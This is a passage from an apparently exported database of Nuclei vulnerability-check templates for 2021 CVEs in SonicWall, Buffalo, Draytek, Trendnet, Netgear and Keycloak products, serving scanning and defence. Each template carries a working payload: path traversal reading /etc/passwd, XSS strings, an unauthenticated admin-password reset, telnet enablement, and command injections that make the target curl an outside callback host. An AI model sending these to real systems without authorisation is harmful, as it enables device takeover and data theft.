4a0a00473045022100e38f80c4ba37d6ad8f1e127a4526fd195044d8a0beb3acb9716a231adfcb0bb7022019e048850c00a33d4cb35452a239138bd55f8c2b6271a2efbbbca623cba5b449:922c64590222798bb761d5b6d8e72950", "hash": "8948b00ca226d0c9a7b480be4e6f5e20", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825c" }, "name": "CVE-2021-20031.yaml", "content": "id: CVE-2021-20031\n\ninfo:\n name: SonicWall SonicOS 7.0 - Open Redirect\n author: gy741\n severity: medium\n description: SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site.\n remediation: |\n Apply the latest security patch or update provided by SonicWall to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50414\n - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0019\n - http://packetstormsecurity.com/files/164502/Sonicwall-SonicOS-7.0-Host-Header-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20031\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20031\n cwe-id: CWE-601\n epss-score: 0.01202\n epss-percentile: 0.84903\n cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sonicwall\n product: sonicos\n google-query: inurl:\"auth.html\" intitle:\"SonicWall\"\n tags: cve,cve2021,sonicwall,redirect,edb,packetstorm\n\nhttp:\n - raw:\n - |\n GET / HTTP/1.1\n Host: {{randstr}}.tld\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'https://{{randstr}}.tld/auth.html'\n - 'Please be patient as you are being re-directed'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a88f073b7af18401e8266c452e7918ef64d4ad02c5c4254fa02c8492c8d76b24022100efd86ff7c908c8cf283050af56d5e0a0d3ad3e0ccbf6e83fad3847d18c67d514:922c64590222798bb761d5b6d8e72950", "hash": "559fa63159002c7f8e131d47f42c8b50", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825d" }, "name": "CVE-2021-20038.yaml", "content": "id: CVE-2021-20038\n\ninfo:\n name: SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution\n author: dwisiswant0, jbaines-r7\n severity: critical\n description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or crash the affected system.\n remediation: |\n Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability.\n reference:\n - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis\n - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20038\n - https://github.com/jbaines-r7/badblood\n - https://github.com/Ostorlab/KEV\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20038\n cwe-id: CWE-787,CWE-121\n epss-score: 0.95823\n epss-percentile: 0.99394\n cpe: cpe:2.3:o:sonicwall:sma_200_firmware:10.2.0.8-37sv:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: sonicwall\n product: sma_200_firmware\n tags: cve2021,cve,overflow,rce,sonicwall,kev\nvariables:\n useragent: '{{rand_base(6)}}'\n\nhttp:\n - raw:\n - |\n GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n prefix_addr:\n - \"%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf\" # stack's top address\n system_addr:\n - \"%08%b7%06%08\" # for 10.2.1.2-24sv\n - \"%64%b8%06%08\" # for 10.2.1.1-1[79]sv\n attack: clusterbomb\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: {{useragent}}\"\n# digest: 4a0a00473045022100b49265d42322ef09c210c86e7f05e3852423926f090b97d3bcdd6bcea1d7778002200556aea3a7775b4e81ccfa40289681631bfa4b778f8405ee374816a699599029:922c64590222798bb761d5b6d8e72950", "hash": "5044bc1bd4df4cc3903d734a6d06bd3d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825e" }, "name": "CVE-2021-20090.yaml", "content": "id: CVE-2021-20090\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Path Traversal\n author: gy741\n severity: critical\n description: |\n Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20090\n - https://www.kb.cert.org/vuls/id/914124\n - https://www.secpod.com/blog/arcadyan-based-routers-and-modems-under-active-exploitation/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20090\n cwe-id: CWE-22\n epss-score: 0.97465\n epss-percentile: 0.99955\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve,cve2021,lfi,buffalo,firmware,iot,kev,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'URLToken(cgi_path)'\n - 'pppoe'\n - 'wan'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009f2ac54d068e5549fd7eaf1335230f3f8bdad9d601c0edd791a9851e6d9511820221008e1bcf8ae00bf61371d0684a711c6136b439ef8ef90dc6d9f559231bce340961:922c64590222798bb761d5b6d8e72950", "hash": "1c7432ea2d7d12259474ea03b1940800", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30825f" }, "name": "CVE-2021-20091.yaml", "content": "id: CVE-2021-20091\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Configuration File Injection\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.\n impact: |\n An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.\n reference:\n - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-20091\n epss-score: 0.00928\n epss-percentile: 0.81222\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve2021,cve,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n POST /images/..%2fapply_abstract.cgi HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"/Success.htm\"\n\n - type: status\n status:\n - 302\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n# digest: 4b0a00483046022100dd49a706de9b916f92684a08c80476589aa14b407bde15ee8a4cc56622060174022100d77abfdb0134802a565bbd5c593e458978e19bf0ff9973231988835c3199bfe8:922c64590222798bb761d5b6d8e72950", "hash": "b25de58988f3cb50e4140fff68bc88b7", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308260" }, "name": "CVE-2021-20092.yaml", "content": "id: CVE-2021-20092\n\ninfo:\n name: Buffalo WSR-2533DHPL2 - Improper Access Control\n author: gy741,pdteam,parth\n severity: high\n description: |\n The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.\n remediation: |\n Apply the latest firmware update provided by Buffalo to fix the access control issue.\n reference:\n - https://www.tenable.com/security/research/tra-2021-13\n - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20091\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20092\n cwe-id: CWE-287\n epss-score: 0.01583\n epss-percentile: 0.87054\n cpe: cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: buffalo\n product: wsr-2533dhpl2-bk_firmware\n tags: cve2021,cve,buffalo,firmware,iot,tenable\n\nhttp:\n - raw:\n - |\n GET /images/..%2finfo.html HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/info.html\n - |\n GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\n Host: {{Hostname}}\n Cookie: lang=8; url=ping.html; mobile=false;\n Referer: {{BaseURL}}/info.html\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/x-javascript\"\n\n - type: word\n words:\n - \"/*DEMO*/\"\n - \"addCfg(\"\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: httoken\n group: 1\n regex:\n - 'base64\\,(.*?)\" border='\n internal: true\n# digest: 490a0046304402204a050931d97fb4bd96f5b79ea9e272dd12ddd010881090fa1fbe7d66bf8dba7502207114368dda3e6e1d7423ee40b0eac74d3bee7aa8ac6000c9ae2eac06ca1acd32:922c64590222798bb761d5b6d8e72950", "hash": "13c128d9cb3d2d250d6fdaa1103fe214", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308261" }, "name": "CVE-2021-20114.yaml", "content": "id: CVE-2021-20114\n\ninfo:\n name: TCExam <= 14.8.1 - Sensitive Information Exposure\n author: push4d\n severity: high\n description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to unauthorized access or data leakage.\n remediation: |\n Upgrade TCExam to a version higher than 14.8.1 to mitigate the vulnerability.\n reference:\n - https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20114\n - https://www.tenable.com/security/research/tra-2021-32\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20114\n cwe-id: CWE-425\n epss-score: 0.01409\n epss-percentile: 0.86167\n cpe: cpe:2.3:a:tecnick:tcexam:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tecnick\n product: tcexam\n tags: cve,cve2021,tcexam,disclosure,exposure,tenable,tecnick\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cache/backup/\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Index of /cache/backup\"\n - \"Parent Directory\"\n - \".sql.gz\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220593509be71e4f3c4a93f5218c7615fc4b876c64259f2151d89a663d9d11aa510022100f6a0490be29ac53bcba0d368c4835cfaa80d384c4a9dc507896e7f02f69c17fe:922c64590222798bb761d5b6d8e72950", "hash": "674163c81f24711cb4eb410c68edb2d6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308262" }, "name": "CVE-2021-20123.yaml", "content": "id: CVE-2021-20123\n\ninfo:\n name: Draytek VigorConnect 1.6.0-B - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: |\n Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Draytek VigorConnect 1.6.0-B.\n reference:\n - https://www.tenable.com/security/research/tra-2021-42\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20123\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20123\n cwe-id: CWE-22\n epss-score: 0.03354\n epss-percentile: 0.91162\n cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: draytek\n product: vigorconnect\n shodan-query: http.html:\"VigorConnect\"\n tags: cve2021,cve,draytek,lfi,vigorconnect,tenable\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything\"\n - \"{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"for 16-bit app support\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022062fbdc0055a5e3028d6b0fc1cd8d72136f750008795a0f5fa47bed7b03f7d2ae0220630d19cd162113ec4c1fab558f6170e0f964f3b697b287d62f4807ed37a54c4e:922c64590222798bb761d5b6d8e72950", "hash": "acbe825e909af02a914b29dcaadf1ef8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308263" }, "name": "CVE-2021-20124.yaml", "content": "id: CVE-2021-20124\n\ninfo:\n name: Draytek VigorConnect 6.0-B3 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Draytek to fix the LFI vulnerability in VigorConnect 6.0-B3.\n reference:\n - https://www.tenable.com/security/research/tra-2021-42\n - https://www.draytek.com/products/vigorconnect/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20124\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-20124\n cwe-id: CWE-22\n epss-score: 0.01331\n epss-percentile: 0.85744\n cpe: cpe:2.3:a:draytek:vigorconnect:1.6.0:beta3:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: draytek\n product: vigorconnect\n shodan-query: http.html:\"VigorConnect\"\n tags: cve2021,cve,draytek,lfi,vigorconnect,tenable\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd\"\n - \"{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n - \"for 16-bit app support\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201b3f1f755c121ccb9a251c16ad6e7453fc09afe729910ba0627eaa855d04e7f70220147595c2aad515d0ffa806be04849a7530d35e3b15e3b587f301e54c4b30f9da:922c64590222798bb761d5b6d8e72950", "hash": "bb0699809d20b6e9ca9de3135f8593c9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308264" }, "name": "CVE-2021-20137.yaml", "content": "id: CVE-2021-20137\n\ninfo:\n name: Gryphon Tower - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137\n - https://www.tenable.com/security/research/tra-2021-51\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20137\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20137\n cwe-id: CWE-79\n epss-score: 0.24456\n epss-percentile: 0.96515\n cpe: cpe:2.3:o:gryphonconnect:gryphon_tower_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gryphonconnect\n product: gryphon_tower_firmware\n tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: word\n part: body\n words:\n - 'onfocus=alert(document.domain) autofocus=1>'\n - 'Send Access Request URL'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f59adf2060e9bd5cd6778f48d141f1bd0ac128d97a8dde7e931d4f3135d0e887022100f9c874e8c0cc7c2e23d9bd5f892e66fb4e28e818ba92abb6ccc29c10c845173e:922c64590222798bb761d5b6d8e72950", "hash": "7d85f755fc411ee9368013474c037a55", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308265" }, "name": "CVE-2021-20150.yaml", "content": "id: CVE-2021-20150\n\ninfo:\n name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure\n author: gy741\n severity: medium\n description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.\n impact: |\n An attacker can obtain sensitive credentials, leading to unauthorized access to the router.\n remediation: |\n Update the router firmware to the latest version to fix the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-54\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20150\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-20150\n cwe-id: CWE-306\n epss-score: 0.19434\n epss-percentile: 0.95837\n cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: trendnet\n product: tew-827dru_firmware\n shodan-query: http.html:\"TEW-827DRU\"\n tags: cve2021,cve,disclosure,router,tenable,trendnet\n\nhttp:\n - raw:\n - |\n POST /apply_sec.cgi HTTP/1.1\n Host: {{Hostname}}\n\n action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'ftp_username'\n - 'ftp_password'\n - 'ftp_permission'\n - 'TEW-827DRU'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: password\n group: 1\n regex:\n - ''\n part: body\n# digest: 4a0a00473045022020641e1868128b30593d1ddc725f1ed066daed96b21177490ee6e7659745b839022100ba439cd4360b3cedb6b422f6d08a9c25bae2c5d95591e97afcc0b9acd99d0bd6:922c64590222798bb761d5b6d8e72950", "hash": "b6132001226a7cb7d0b55afa94749804", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308266" }, "name": "CVE-2021-20158.yaml", "content": "id: CVE-2021-20158\n\ninfo:\n name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change\n author: gy741\n severity: critical\n description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.\n impact: |\n An attacker with authenticated access can gain unauthorized control over the affected device.\n remediation: |\n Upgrade to the latest firmware version provided by Trendnet to fix the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2021-54\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20150\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-20158\n cwe-id: CWE-306\n epss-score: 0.01211\n epss-percentile: 0.83754\n cpe: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: trendnet\n product: tew-827dru_firmware\n shodan-query: http.html:\"TEW-827DRU\"\n tags: cve2021,cve,disclosure,router,intrusive,tenable,trendnet\nvariables:\n password: \"{{rand_base(6)}}\"\n\nhttp:\n - raw:\n - |\n POST /apply_sec.cgi HTTP/1.1\n Host: {{Hostname}}\n\n ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n - |\n POST /apply_sec.cgi HTTP/1.1\n Host: {{Hostname}}\n\n html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'setConnectDevice'\n - 'setInternet'\n - 'setWlanSSID'\n - 'TEW-827DRU'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022026f2cb4d546143dddc1646a081ebfaeecf087f82b9adc26ae239313b24dc4a4d0221008e2cbba77ac00dde9277de789229bd07830e4a7b7c25c58778ac3c9b1ddeddb9:922c64590222798bb761d5b6d8e72950", "hash": "12ea3e773f1180d3ca8b123cb70825b8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308267" }, "name": "CVE-2021-20167.yaml", "content": "id: CVE-2021-20167\n\ninfo:\n name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun\n author: gy741\n severity: high\n description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'\n remediation: Upgrade to newer release of the RAX43 firmware.\n reference:\n - https://www.tenable.com/security/research/tra-2021-55\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20166\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20167\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8\n cve-id: CVE-2021-20167\n cwe-id: CWE-77\n epss-score: 0.94822\n epss-percentile: 0.99222\n cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netgear\n product: rax43_firmware\n tags: cve2021,cve,tenable,netgear,rce,router\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\n Host: {{Hostname}}\n\n \"name\":\"';$(curl {{interactsh-url}});'\",\n \"email\":\"a@b.c\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4b0a00483046022100a120fefbb36e69c70d4665614d7579e6da2abee8955d5686ba345bf0c8600bdb022100eb3394e9cd130d5934476c1186acd108ebc7cf70016720dc85dc8f8275b2e246:922c64590222798bb761d5b6d8e72950", "hash": "594c29aa7963a30be1d34355fc351a4a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308268" }, "name": "CVE-2021-20323.yaml", "content": "id: CVE-2021-20323\n\ninfo:\n name: Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting\n author: ndmalc,incogbyte\n severity: medium\n description: |\n Keycloak 10.0.0 to 18.0.0 contains a cross-site scripting vulnerability via the client-registrations endpoint. On a POST request, the application does not sanitize an unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as HTML. This can be performed on any realm present on the Keycloak instance. Since the bug requires Content-Type application/json and is submitted via a POST, there is no common path to exploit that has a user impact.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade Keycloak to a version that is not affected by the vulnerability (10.0.1 or higher).\n reference:\n - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j\n - https://bugzilla.redhat.com/show_bug.cgi?id=2013577\n - https://access.redhat.com/security/cve/CVE-2021-20323\n - https://github.com/ndmalc/CVE-2021-20323\n - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d\n - https://nvd.nist.gov/vuln/detail/CVE-2021-20323\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-20323\n cwe-id: CWE-79\n epss-score: 0.00173\n epss-percentile: 0.53461\n cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: redhat\n product: keycloak\n shodan-query: html:\"Keycloak\"\n tags: cve2021,cve,keycloak,xss,redhat\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/auth/realms/master/clients-registrations/default\"\n - 